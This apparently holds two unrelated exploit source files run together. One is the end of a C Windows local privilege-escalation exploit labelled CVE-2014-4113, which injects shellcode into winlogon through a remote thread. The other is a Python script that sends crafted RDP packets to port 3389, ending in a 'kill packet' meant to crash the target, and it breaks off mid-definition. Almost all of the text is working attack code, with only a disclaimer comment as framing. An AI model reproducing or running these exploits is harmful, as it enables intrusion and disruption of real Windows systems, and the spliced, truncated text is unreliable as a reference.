tagWnd fail!\n"); break;; } ULONGLONG ul_align=0xFFFFFFFBLL-(ULONGLONG)fake_tagWnd_addr; if (ul_align > 0x10000){ printf("alloc fake fail: %x!\n" ,fake_tagWnd_addr); break; } memset(fake_tagWnd_addr+ul_align ,0 ,0x1000); *(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_idx_tagWND)=0x0; *(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_pti_tagWnd)=fake_tagwnd_pti; //oft 0x170 == win32process *(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_18h_tagWnd)=0x0; //0 ,check in IsWindowDesktopComposed bRet=true; } while (false); return bRet; } LRESULT __stdcall __wh_wnd_proc( int code, WPARAM wparam, LPARAM lparam ) { do { CWPSTRUCT* lpm=(CWPSTRUCT*)lparam; if (lpm->message != MN_FINDWINDOWFROMPOINT || g_bis_mn_findwnded==true) break; g_bis_mn_findwnded=true; UnhookWindowsHook(WH_CALLWNDPROC ,__wh_wnd_proc); g_ori_wnd_proc=(WNDPROC)SetWindowLongPtr(lpm->hwnd ,GWLP_WNDPROC ,(LONG_PTR)__wnd_proc_sl); } while (false); return CallNextHookEx(g_hhk ,code ,wparam ,lparam); } LRESULT __wnd_proc_sl( HWND hwnd, UINT umsg, WPARAM wparam, LPARAM lparam ) { do { if (umsg != MN_FINDWINDOWFROMPOINT ) break; if (g_bis_endmenu) break; g_bis_endmenu=1; EndMenu(); return 0xFFFFFFFB; } while (false); return CallWindowProc(g_ori_wnd_proc ,hwnd ,umsg ,wparam ,lparam); } LRESULT __stdcall __wnd_proc( HWND hwnd, UINT umsg, WPARAM wparam, LPARAM lparam ) { if (umsg==WM_ENTERIDLE && g_bis_idled==FALSE) { g_bis_idled=TRUE; PostMessage(hwnd ,WM_KEYFIRST ,0x28 ,0); PostMessage(hwnd ,WM_KEYFIRST ,0X27 ,0); PostMessage(hwnd ,WM_LBUTTONDOWN ,0 ,0xff00ff); } return DefWindowProc(hwnd ,umsg ,wparam ,lparam); } DWORD __stdcall __thread_plroc( void* param ) { bool bisok=false; WNDCLASS wndcls={0}; do { wndcls.lpfnWndProc=__wnd_proc; wndcls.lpszClassName="cve_2014_4113"; RegisterClass(&wndcls); HWND hwnd=CreateWindowEx(0 ,wndcls.lpszClassName ,NULL ,0 ,0 ,0, 200 ,200 ,NULL ,NULL ,NULL ,NULL); if (hwnd==NULL){ printf("CreateWindowEx() fail: 0x%x\n" ,GetLastError()); break; } HMENU hmenu=__init_menu(); if (hmenu==NULL){ printf("__init_menu() fail: 0x%x\n" ,GetLastError()); break; } bool bisok=__init_fake_tagWnd(); if (bisok==false){ printf("__init_fake_tagWnd() fail:0x%x\n" ,GetLastError()); break; } g_hhk=SetWindowsHookEx(WH_CALLWNDPROC ,__wh_wnd_proc ,NULL ,GetCurrentThreadId()); if (g_hhk==NULL){ printf("SetWindowsHookEx() fail:0x%x\n" ,GetLastError()); break; } bisok=TrackPopupMenu(hmenu ,0 ,0x0FFFFD8F0 ,0x0FFFFD8F0 ,0 ,hwnd ,NULL); if (bisok==false){ printf("TrackPopupMenu() fail:0x%x\n" ,GetLastError()); break; } CloseHandle(hmenu); DestroyWindow(hwnd); } while (FALSE); return 0; } int main( int argc ,char** argv ) { bool bisok=false; do { if (argc != 2){ printf("usage: xxx fpath"); break; } HANDLE hProcessToken=NULL ,hRestrictedToken=NULL; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken)) { printf("Could not open process token\n"); break; } if (!CreateRestrictedToken(hProcessToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, &hRestrictedToken)){ printf("Could not create restricted token\n"); break; } if (!AdjustTokenPrivileges(hRestrictedToken, TRUE, NULL, 0, NULL, NULL)) { printf("Could not adjust privileges\n"); break; } CloseHandle(hProcessToken); HANDLE hthread=CreateThread(NULL ,0 ,__thread_plroc ,NULL ,0 ,NULL); if (hthread==NULL){ printf("CreateThread() fail: 0x%x\n" ,GetLastError()); break; } WaitForSingleObject(hthread ,1000); TerminateThread(hthread ,0); if (!ImpersonateLoggedOnUser(hRestrictedToken)){ printf("ImpersonateLoggedOnUser failed!\n"); break; } PVOID pfn_cps=GetProcAddress(LoadLibrary("Kernel32.dll") ,"CreateProcessA"); if (pfn_cps==NULL){ printf("GetProcess CreateProcessA failed!\n"); break; } ULONGLONG ul_pid_winlogon=__calc_pid(); if (ul_pid_winlogon==NULL){ printf("__calc_winlogon_pid failed!\n"); break; } HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS ,TRUE ,ul_pid_winlogon); if (hprocess==NULL){ printf("OpenProcess failed: %x\n" ,GetLastError()); break; } //init params PVOID params=VirtualAllocEx(hprocess ,NULL ,strlen(argv[1])+10 ,MEM_COMMIT ,PAGE_READWRITE); if (params==NULL){ printf("VirtualAllocEx failed:%x\n" ,GetLastError()); break; } ULONGLONG ul_ret_wrt=0; bisok=WriteProcessMemory(hprocess ,params ,argv[1] ,strlen(argv[1])+2 ,(SIZE_T*)&ul_ret_wrt); if (bisok==false || ul_ret_wrt < strlen(argv[1])+2){ printf("WriteProcessMemory() failed!\n"); break; } //init shellcode PVOID shellcode=VirtualAllocEx(hprocess ,NULL ,0x220 ,MEM_COMMIT ,PAGE_EXECUTE_READWRITE); if (shellcode==NULL){ printf("VirtualAllocEx failed:%x\n" ,GetLastError()); break; } bisok=WriteProcessMemory(hprocess ,shellcode ,__s_code ,sizeof(__s_code) ,(SIZE_T*)&ul_ret_wrt); if (bisok==false || ul_ret_wrt < sizeof(__s_code)){ printf("WriteProcessMemory() failed!\n"); break; } DWORD dw_tid=0; HANDLE htd_rmt=CreateRemoteThread(hprocess ,NULL ,0 ,(LPTHREAD_START_ROUTINE )shellcode ,params ,0 ,&dw_tid); if (htd_rmt==NULL){ printf("CreateRemoteThread() fail!\n"); break; } //clear CloseHandle(htd_rmt); CloseHandle(hprocess); CloseHandle(hRestrictedToken); } while (false); return 0; }

import socket, sys, struct from OpenSSL import SSL from impacket.structure import Structure # I'm not responsible for what you use this to accomplish and should only be used for education purposes # Could clean these up since I don't even use them class TPKT(Structure): commonHdr = ( ('Version','B=3'), ('Reserved','B=0'), ('Length','>H=len(TPDU)+4'), ('_TPDU','_-TPDU','self["Length"]-4'), ('TPDU',':=""'), ) class TPDU(Structure): commonHdr = ( ('LengthIndicator','B=len(VariablePart)+1'), ('Code','B=0'), ('VariablePart',':=""'), ) def __init__(self, data = None): Structure.__init__(self,data) self['VariablePart']='' class CR_TPDU(Structure): commonHdr = ( ('DST-REF','<H=0'), ('SRC-REF','<H=0'), ('CLASS-OPTION','B=0'), ('Type','B=0'), ('Flags','B=0'), ('Length','<H=8'), ) class DATA_TPDU(Structure): commonHdr = ( ('EOT','B=0x80'), ('UserData',':=""'), ) def __init__(self, data = None): Structure.__init__(self,data) self['UserData'] ='' class RDP_NEG_REQ(CR_TPDU): structure = ( ('requestedProtocols','<L'), ) def __init__(self,data=None): CR_TPDU.__init__(self,data) if data is None: self['Type'] = 1 def send_init_packets(host): tpkt = TPKT() tpdu = TPDU() rdp_neg = RDP_NEG_REQ() rdp_neg['Type'] = 1 rdp_neg['requestedProtocols'] = 1 tpdu['VariablePart'] = rdp_neg.getData() tpdu['Code'] = 0xe0 tpkt['TPDU'] = tpdu.getData() s = socket.socket() s.connect((host, 3389)) s.sendall(tpkt.getData()) s.recv(8192) ctx = SSL.Context(SSL.TLSv1_METHOD) tls = SSL.Connection(ctx,s) tls.set_connect_state() tls.do_handshake() return tls # This can be fixed length now buttfuckit def send_client_data(tls): p = "\x03\x00\x01\xca\x02\xf0\x80\x7f\x65\x82\x07\xc2\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x30\x19\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x04\x82\x01\x61\x00\x05\x00\x14\x7c\x00\x01\x81\x48\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63\x61\x81\x34\x01\xc0\xea\x00\x0a\x00\x08\x00\x80\x07\x38\x04\x01\xca\x03\xaa\x09\x04\x00\x00\xee\x42\x00\x00\x44\x00\x45\x00\x53\x00\x4b\x00\x54\x00\x4f\x00\x50\x00\x2d\x00\x46\x00\x38\x00\x34\x00\x30\x00\x47\x00\x49\x00\x4b\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x0f\x00\xaf\x07\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42\x07\x00\x01\x00\x00\x00\x56\x02\x00\x00\x50\x01\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x04\xc0\x0c\x00\x15\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x38\x00\x04\x00\x00\x00\x72\x64\x70\x73\x6e\x64\x00\x00\x0f\x00\x00\xc0\x63\x6c\x69\x70\x72\x64\x72\x00\x00\x00\xa0\xc0\x64\x72\x64\x79\x6e\x76\x63\x00\x00\x00\x80\xc0\x4d\x53\x5f\x54\x31\x32\x30\x00\x00\x00\x00\x00" size0 = struct.pack(">h", len(p)) size1 = struct.pack(">h", len(p)-12) size2 = struct.pack(">h", len(p)-109) size3 = struct.pack(">h", len(p)-118) size4 = struct.pack(">h", len(p)-132) size5 = struct.pack(">h", len(p)-390) ba = bytearray() ba.extend(map(ord, p)) ba[2] = size0[0] ba[3] = size0[1] ba[10] = size1[0] ba[11] = size1[1] ba[107] = size2[0] ba[108] = size2[1] ba[116] = 0x81 ba[117] = size3[1] ba[130] = 0x81 ba[131] = size4[1] ba[392] = size5[1] tls.sendall(bytes(ba)) tls.recv(8192) def send_client_info(tls): p = b"\x03\x00\x01\x61\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x81\x52\x40\x00\xa1\xa5\x09\x04\x09\x04\xbb\x47\x03\x00\x00\x00\x0e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x41\x41\x41\x00\x38\x00\x2e\x00\x32\x00\x33\x00\x32\x00\x2e\x00\x31\x00\x00\x00\x40\x00\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x41\x41\x41\x00\x57\x00\x53\x00\x5c\x00\x73\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00\xa4\x01\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\xff\xff\xff\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x64\x00\x00\x00" tls.sendall(p) def send_channel_packets(tls): p1 = b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00" tls.sendall(p1) p2 = b"\x03\x00\x00\x08\x02\xf0\x80\x28" tls.sendall(p2) tls.recv(1024) p4 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xeb" tls.sendall(p4) tls.recv(1024) p5 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xec" tls.sendall(p5) tls.recv(1024) p6 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xed" tls.sendall(p6) tls.recv(1024) p7 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xee" tls.sendall(p7) tls.recv(1024) p8 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xef" tls.sendall(p8) tls.recv(1024) def send_confirm_active(tls, shareid): p = "\x03\x00\x02\x63\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x82\x54\x54\x02\x13\x00\xf0\x03\xea\x03\x01\x00\xea\x03\x06\x00\x3e\x02\x4d\x53\x54\x53\x43\x00\x17\x00\x00\x00\x01\x00\x18\x00\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00\x01\x00\x00\x1a\x01\x00\x00\x00\x03\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x08\x00\x06\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x0c\x00\x00\x00\x00\x00\x02\x00\x02\x00\x08\x00\x0a\x00\x01\x00\x14\x00\x15\x00\x09\x00\x08\x00\x00\x00\x00\x00\x0d\x00\x58\x00\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x08\x00\x01\x00\x00\x00\x0e\x00\x08\x00\x01\x00\x00\x00\x10\x00\x34\x00\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00\x0f\x00\x08\x00\x01\x00\x00\x00\x11\x00\x0c\x00\x01\x00\x00\x00\x00\x28\x64\x00\x14\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x00\x00\x15\x00\x0c\x00\x02\x00\x00\x00\x00\x0a\x00\x01\x1a\x00\x08\x00\xaf\x94\x00\x00\x1c\x00\x0c\x00\x12\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x06\x00\x01\x00\x1e\x00\x08\x00\x01\x00\x00\x00\x18\x00\x0b\x00\x02\x00\x00\x00\x03\x0c\x00\x1d\x00\x5f\x00\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04" ba = bytearray() ba.extend(map(ord, p)) tls.sendall(bytes(ba)) def send_establish_session(tls): p = b"\x03\x00\x00\x24\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x16\x16\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x08\x00\x1f\x00\x00\x00\x01\x00\xea\x03" tls.sendall(p) p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" tls.sendall(p) p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" tls.sendall(p) p = b"\x03\x00\x05\x81\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x85\x72\x72\x05\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x02\x00\x00\x00\xa3\xce\x20\x35\xdb\x94\xa5\xe6\x0d\xa3\x8c\xfb\x64\xb7\x63\xca\xe7\x9a\x84\xc1\x0d\x67\xb7\x91\x76\x71\x21\xf9\x67\x96\xc0\xa2\x77\x5a\xd8\xb2\x74\x4f\x30\x35\x2b\xe7\xb0\xd2\xfd\x81\x90\x1a\x8f\xd5\x5e\xee\x5a\x6d\xcb\xea\x2f\xa5\x2b\x06\xe9\x0b\x0b\xa6\xad\x01\x2f\x7a\x0b\x7c\xff\x89\xd3\xa3\xe1\xf8\x00\x96\xa6\x8d\x9a\x42\xfc\xab\x14\x05\x8f\x16\xde\xc8\x05\xba\xa0\xa8\xed\x30\xd8\x67\x82\xd7\x9f\x84\xc3\x38\x27\xda\x61\xe3\xa8\xc3\x65\xe6\xec\x0c\xf6\x36\x24\xb2\x0b\xa6\x17\x1f\x46\x30\x16\xc7\x73\x60\x14\xb5\xf1\x3a\x3c\x95\x7d\x7d\x2f\x74\x7e\x56\xff\x9c\xe0\x01\x32\x9d\xf2\xd9\x35\x5e\x95\x78\x2f\xd5\x15\x6c\x18\x34\x0f\x43\xd7\x2b\x97\xa9\xb4\x28\xf4\x73\x6c\x16\xdb\x43\xd7\xe5\x58\x0c\x5a\x03\xe3\x73\x58\xd7\xd9\x76\xc2\xfe\x0b\xd7\xf4\x12\x43\x1b\x70\x6d\x74\xc2\x3d\xf1\x26\x60\x58\x80\x31\x07\x0e\x85\xa3\x95\xf8\x93\x76\x99\x9f\xec\xa0\xd4\x95\x5b\x05\xfa\x4f\xdf\x77\x8a\x7c\x29\x9f\x0b\x4f\xa1\xcb\xfa\x95\x66\xba\x47\xe3\xb0\x44\xdf\x83\x03\x44\x24\xf4\x1e\xf2\xe5\xcb\xa9\x53\x04\xc2\x76\xcb\x4d\xc6\xc2\xd4\x3f\xd3\x8c\xb3\x7c\xf3\xaa\xf3\x93\xfe\x25\xbd\x32\x7d\x48\x6e\x93\x96\x68\xe5\x18\x2b\xea\x84\x25\x69\x02\xa5\x38\x65\x6f\x0f\x9f\xf6\xa1\x3a\x1d\x22\x9d\x3f\x6d\xe0\x4c\xee\x8b\x24\xf0\xdc\xff\x70\x52\xa7\x0d\xf9\x52\x8a\x1e\x33\x1a\x30\x11\x15\xd7\xf8\x95\xa9\xbb\x74\x25\x8c\xe3\xe9\x93\x07\x43\xf5\x50\x60\xf7\x96\x2e\xd3\xff\x63\xe0\xe3\x24\xf1\x10\x3d\x8e\x0f\x56\xbc\x2e\xb8\x90\x0c\xfa\x4b\x96\x68\xfe\x59\x68\x21\xd0\xff\x52\xfe\x5c\x7d\x90\xd4\x39\xbe\x47\x9d\x8e\x7a\xaf\x95\x4f\x10\xea\x7b\x7a\xd3\xca\x07\x28\x3e\x4e\x4b\x81\x0e\xf1\x5f\x1f\x8d\xbe\x06\x40\x27\x2f\x4a\x03\x80\x32\x67\x54\x2f\x93\xfd\x25\x5d\x6d\xa0\xad\x23\x45\x72\xff\xd1\xeb\x5b\x51\x75\xa7\x61\xe0\x3f\xe4\xef\xf4\x96\xcd\xa5\x13\x8a\xe6\x52\x74\x70\xbf\xc1\xf9\xfb\x68\x9e\xdd\x72\x8f\xb4\x44\x5f\x3a\xcb\x75\x2a\x20\xa6\x69\xd2\x76\xf9\x57\x46\x2b\x5b\xda\xba\x0f\x9b\xe0\x60\xe1\x8b\x90\x33\x41\x0a\x2d\xc5\x06\xfe\xd0\xf0\xfc\xde\x35\xd4\x1e\xaa\x76\x0b\xae\xf4\xd5\xbd\xfa\xf3\x55\xf5\xc1\x67\x65\x75\x1c\x1d\x5e\xe8\x3a\xfe\x54\x50\x23\x04\xae\x2e\x71\xc2\x76\x97\xe6\x39\xc6\xb2\x25\x87\x92\x63\x52\x61\xd1\x6c\x07\xc1\x1c\x00\x30\x0d\xa7\x2f\x55\xa3\x4f\x23\xb2\x39\xc7\x04\x6c\x97\x15\x7a\xd7\x24\x33\x91\x28\x06\xa6\xe7\xc3\x79\x5c\xae\x7f\x50\x54\xc2\x38\x1e\x90\x23\x1d\xd0\xff\x5a\x56\xd6\x12\x91\xd2\x96\xde\xcc\x62\xc8\xee\x9a\x44\x07\xc1\xec\xf7\xb6\xd9\x9c\xfe\x30\x1c\xdd\xb3\x3b\x93\x65\x3c\xb4\x80\xfb\xe3\x87\xf0\xee\x42\xd8\xcf\x08\x98\x4d\xe7\x6b\x99\x0a\x43\xed\x13\x72\x90\xa9\x67\xfd\x3c\x63\x36\xec\x55\xfa\xf6\x1f\x35\xe7\x28\xf3\x87\xa6\xce\x2e\x34\xaa\x0d\xb2\xfe\x17\x18\xa2\x0c\x4e\x5f\xf0\xd1\x98\x62\x4a\x2e\x0e\xb0\x8d\xb1\x7f\x32\x52\x8e\x87\xc9\x68\x7c\x0c\xef\xee\x88\xae\x74\x2a\x33\xff\x4b\x4d\xc5\xe5\x18\x38\x74\xc7\x28\x83\xf7\x72\x87\xfc\x79\xfb\x3e\xce\xd0\x51\x13\x2d\x7c\xb4\x58\xa2\xe6\x28\x67\x4f\xec\xa6\x81\x6c\xf7\x9a\x29\xa6\x3b\xca\xec\xb8\xa1\x27\x50\xb7\xef\xfc\x81\xbf\x5d\x86\x20\x94\xc0\x1a\x0c\x41\x50\xa9\x5e\x10\x4a\x82\xf1\x74\x1f\x78\x21\xf5\x70\x61\x24\x00\x3d\x47\x5f\xf3\x25\x80\x3c\x4b\xea\xa3\xf4\x77\xea\xa1\x42\x1a\x17\x0f\x6d\xa8\x35\x9e\x91\x26\x34\x43\x04\xc6\xc6\x5b\x21\x7d\x8c\xc7\x22\x91\x7b\x2c\x2d\x2f\xd6\x7e\xa5\x52\xa8\x08\x80\xeb\x60\xd1\x44\x09\x8e\x3c\xa1\xaa\x67\x60\x0a\x26\xc6\xb5\xc6\x79\xa6\x4f\x8b\x8c\x25\x5c\xf1\x0b\x23\xf4\xd8\xa6\x6d\xf1\x91\x78\xf9\xe5\x2a\x50\x2f\x5a\x44\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x77\x5a\xd8\xb2\x74\x4f\x30\x35\xbf\x28\xae\xd9\xa2\x98\xa5\xbc\x60\xca\xb8\x90\x4d\x20\x46\xd9\x8a\x1a\x30\x01\x8b\x38\x63\x1a\x57\x09\x51\x46\x95\x9b\xd8\x80\x0c\xb0\x77\x24\xbf\x2b\xd3\x57\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x56\x92\x38\xed\x6b\x9b\x5b\x1f\xba\x53\xa1\x0e\xf7\x75\x10\x53\x22\x4c\x0a\x75\x88\x54\x69\x3f\x3b\xf3\x18\x67\x6b\x0f\x19\xd1\x00\x25\x86\xcd\xa8\xd9\xdd\x1d\x8d\x26\x87\x54\xd9\x79\xc0\x74\x65\x90\xd7\x33\x32\xaf\xba\x9d\x5a\xd5\x6c\x7c\xa1\x47\xe1\x49\x6e\x1c\xce\x9f\x62\xaa\x26\x16\x3f\x3c\xec\x5b\x49\xe5\xc0\x60\xd4\xbe\xa7\x88\xbc\xa1\x9f\x29\x71\x8c\xeb\x69\xf8\x73\xfb\xaf\x29\xaa\x40\x1b\xe5\x92\xd2\x77\xa7\x2b\xfb\xb6\x77\xb7\x31\xfb\xdc\x1e\x63\x63\x7d\xf2\xfe\x3c\x6a\xba\x0b\x20\xcb\x9d\x64\xb8\x31\x14\xe2\x70\x07\x2c\xdf\x9c\x6f\xb5\x3a\xc4\xd5\xb5\xc9\x3e\x9a\xd7\xd5\x30\xdc\x0e\x19\x89\xc6\x08\x88\xe1\xca\x81\xa6\x28\xdd\x9c\x74\x05\x11\xe7\xe1\xcc\xbc\xc7\x76\xdd\x55\xe2\xcc\xc2\xcb\xd3\xb6\x48\x01\xdd\xff\xba\xca\x31\xab\x26\x44\x1c\xdc\x06\x01\xdf\xf2\x90\x50\xb8\x6b\x8f\xe8\x29\xf0\xba\xec\xfb\x2d\xfd\x7a\xfc\x7f\x57\xbd\xea\x90\xf7\xcf\x92\x1e\xc4\x20\xd0\xb6\x9f\xd6\xdc\xa1\x82\xa9\x6c\x5e\x3e\x83\x41\x57\x73\xe9\xe7\x5a\x3f\xda\x24\x4f\x73\x5e\xf4\xe0\x92\x24\xbd\x0b\xd0\x3c\x49\x96\xb5\xb5\x05\x32\xcb\x58\x1d\x6f\x97\x51\xee\x0c\xdc\x0b\x2a\x60\xef\x97\x3e\x5a\x30\x81\x15\x91\xcf\x11\x07\x25\x2c\x41\xdb\x70\x72\xe1\x75\xf6\xa5\xff\xe8\x44\xe7\x03\xe3\x61\xaa\xdb\xe0\x07\x3d\x07\x0b\xe3\x5c\x09\xa9\x5e\x10\xfd\xcf\x74\x9e\x23\xf1\x30\x86\x16\xef\x25\x4e\xfe\xa4\x93\xa5\x80\x0a\x01\x39\xcc\x11\x7a\x6e\x94\x22\x5b\xd8\xc6\xc9\xa8\xdf\x13\x96\xb3\x91\x33\x6e\x87\xbb\x94\x63\x2d\x88\x64\xa7\x58\x89\xda\xdc\x7f\x2a\xe3\xa1\x66\xe5\xc8\x7f\xc2\xdb\xc7\x7d\x2f\xa9\x46\x28\x45\x69\xbc\xac\x9f\x85\x9e\xb0\x9f\x9a\x49\xb4\xb1\xcb" tls.sendall(p) p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x03\x00\x32\x00" tls.sendall(p) def send_kill_packet(tls, arch): if arch == "32": p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" elif arch == "64": p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" else: print("Make the second arguement '32' or '64' without quotes") sys.exit() tls.sendall(p) def terminate_connection(tls): p = b"\x03\x00\x00\x09\x02\xf0\x80\x21\x80" tls.sendall(p) def 